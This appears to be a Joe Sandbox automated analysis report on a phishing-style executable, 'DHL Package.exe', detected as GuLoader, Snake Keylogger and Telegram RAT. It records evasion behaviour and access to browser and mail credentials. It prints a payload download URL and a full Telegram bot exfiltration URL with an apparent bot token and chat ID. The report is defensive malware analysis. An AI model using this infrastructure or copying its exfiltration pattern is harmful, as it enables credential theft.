Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\DHL Package.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\DHL Package.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: DHL Package.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.2283851326.000000000616D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\DHL Package.exe

Code function: 0_2_6CA71B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6CA71B5F

Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_3_0019FCBD push C80019CFh; iretd	12_3_0019FCC9
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_3_0019FCBD push C80019CFh; iretd	12_3_0019FCC9
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_3_0019FCBD push C80019CFh; iretd	12_3_0019FCC9
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_3_0019FCBD push C80019CFh; iretd	12_3_0019FCC9

Source: C:\Users\user\Desktop\DHL Package.exe	File created: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\LangDLL.dll			Jump to dropped file
Source: C:\Users\user\Desktop\DHL Package.exe	File created: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll			Jump to dropped file

Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\DHL Package.exe	API/Special instruction interceptor: Address: 64CBCAD
Source: C:\Users\user\Desktop\DHL Package.exe	API/Special instruction interceptor: Address: 24CBCAD

Source: C:\Users\user\Desktop\DHL Package.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Memory allocated: 36EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Memory allocated: 36DF0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\DHL Package.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Thread delayed: delay time: 600000			Jump to behavior

Source: C:\Users\user\Desktop\DHL Package.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\LangDLL.dll			Jump to dropped file
Source: C:\Users\user\Desktop\DHL Package.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll			Jump to dropped file

Source: C:\Users\user\Desktop\DHL Package.exe TID: 3220	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe TID: 3220	Thread sleep time: -600000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 0_2_00402902 FindFirstFileW,	0_2_00402902
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 0_2_00406739 FindFirstFileW,FindClose,	0_2_00406739
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 0_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405AED
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_00402902 FindFirstFileW,	12_2_00402902
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_00406739 FindFirstFileW,FindClose,	12_2_00406739
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	12_2_00405AED

Source: C:\Users\user\Desktop\DHL Package.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Thread delayed: delay time: 600000			Jump to behavior

Source: DHL Package.exe, 0000000C.00000002.6260987034.0000000006A01000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\DHL Package.exe	API call chain: ExitProcess graph end node			graph_0-4775
Source: C:\Users\user\Desktop\DHL Package.exe	API call chain: ExitProcess graph end node			graph_0-4778

Source: C:\Users\user\Desktop\DHL Package.exe

Code function: 0_2_6CA71B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6CA71B5F

Source: C:\Users\user\Desktop\DHL Package.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\DHL Package.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\DHL Package.exe

Process created: C:\Users\user\Desktop\DHL Package.exe "C:\Users\user\Desktop\DHL Package.exe"

Jump to behavior

Source: C:\Users\user\Desktop\DHL Package.exe	Queries volume information: C:\Users\user\Desktop\DHL Package.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\DHL Package.exe

Code function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040348F

Source: C:\Users\user\Desktop\DHL Package.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000C.00000002.6270895609.0000000037035000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.6270895609.000000003710E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.6270895609.0000000036EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DHL Package.exe PID: 4252, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DHL Package.exe PID: 4252, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\DHL Package.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\DHL Package.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\DHL Package.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match

File source: Process Memory Space: DHL Package.exe PID: 4252, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000C.00000002.6270895609.0000000037035000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.6270895609.000000003710E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.6270895609.0000000036EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DHL Package.exe PID: 4252, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DHL Package.exe PID: 4252, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	11 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	1 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	1 System Network Configuration Discovery	SMB/Windows Admin Shares	1 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	2 File and Directory Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	115 System Information Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DHL Package.exe	16%	Virustotal		Browse
DHL Package.exe	5%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\LangDLL.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\LangDLL.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll	1%	Virustotal	Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
reallyfreegeoip.org	0%	Virustotal	Browse
api.telegram.org	2%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://reallyfreegeoip.org/xml/102.129.252.169$	0%	Avira URL Cloud	safe
http://checkip.dyndns.org/	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/102.129.252.169	0%	Avira URL Cloud	safe
https://api.telegram.org	0%	Avira URL Cloud	safe
http://monteveliz.cl/SjZVauFBbad87.bin	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
https://api.telegram.org/bot7197950156:AAHyWbH8kpjv0OHg9kyjLK-uVhbdlEhq_ZQ/sendDocument?chat_id=6873631044&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake	0%	Avira URL Cloud	safe
http://checkip.dyndns.org/	0%	Virustotal		Browse
https://api.telegram.org/bot7197950156:AAHyWbH8kpjv0OHg9kyjLK-uVhbdlEhq_ZQ/sendDocument?chat_id=6873	0%	Avira URL Cloud	safe
https://api.telegram.org	1%	Virustotal		Browse
https://reallyfreegeoip.org	0%	Avira URL Cloud	safe
https://support.google.com/chrome/?p=plugin_flash	0%	Avira URL Cloud	safe
http://www.quovadis.bm0	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	1%	Virustotal		Browse
https://support.google.com/chrome/?p=plugin_flash	0%	Virustotal		Browse
https://reallyfreegeoip.org	0%	Virustotal		Browse
http://checkip.dyndns.org	0%	Avira URL Cloud	safe
http://checkip.dyndns.com	0%	Avira URL Cloud	safe
http://nsis.sf.net/NSIS_ErrorError	0%	Avira URL Cloud	safe
https://ocsp.quovadisoffshore.com0	0%	Avira URL Cloud	safe
http://api.telegram.org	0%	Avira URL Cloud	safe
http://checkip.dyndns.com	0%	Virustotal		Browse
http://checkip.dyndns.org	0%	Virustotal		Browse
http://api.telegram.org	2%	Virustotal		Browse
http://nsis.sf.net/NSIS_ErrorError	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
monteveliz.cl	172.93.120.113	true	false		unknown
reallyfreegeoip.org	172.67.177.134	true	true	0%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	true	2%, Virustotal, Browse	unknown
checkip.dyndns.com	132.226.247.73	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://monteveliz.cl/SjZVauFBbad87.bin	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/102.129.252.169	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7197950156:AAHyWbH8kpjv0OHg9kyjLK-uVhbdlEhq_ZQ/sendDocument?chat_id=6873631044&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.telegram.org	DHL Package.exe, 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmp	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/102.129.252.169$	DHL Package.exe, 0000000C.00000002.6270895609.0000000037012000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037029000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036FED000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037007000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036FFC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	DHL Package.exe, 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmp	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7197950156:AAHyWbH8kpjv0OHg9kyjLK-uVhbdlEhq_ZQ/sendDocument?chat_id=6873	DHL Package.exe, 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org	DHL Package.exe, 0000000C.00000002.6270895609.0000000037012000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037029000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036FED000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037007000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036FFC000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.google.com/chrome/?p=plugin_flash	DHL Package.exe, 0000000C.00000002.6270895609.0000000037098000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.quovadis.bm0	DHL Package.exe, 0000000C.00000002.6273766004.00000000396C0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org	DHL Package.exe, 0000000C.00000002.6270895609.0000000037012000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037029000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036FED000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037007000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036FFC000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036F5F000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://checkip.dyndns.com	DHL Package.exe, 0000000C.00000002.6270895609.0000000036F5F000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	DHL Package.exe, 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmp, DHL Package.exe, 00000000.00000000.1150512237.000000000040A000.00000008.00000001.01000000.00000003.sdmp, DHL Package.exe, 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ocsp.quovadisoffshore.com0	DHL Package.exe, 0000000C.00000002.6273766004.00000000396C0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://api.telegram.org	DHL Package.exe, 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
172.93.120.113	monteveliz.cl	United States	393960	HOST4GEEKS-LLCUS	false
172.67.177.134	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	true
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1489281
Start date and time:	2024-08-07 09:24:16 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DHL Package.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/10@4/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 96% Number of executed functions: 191 Number of non-executed functions: 113
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings
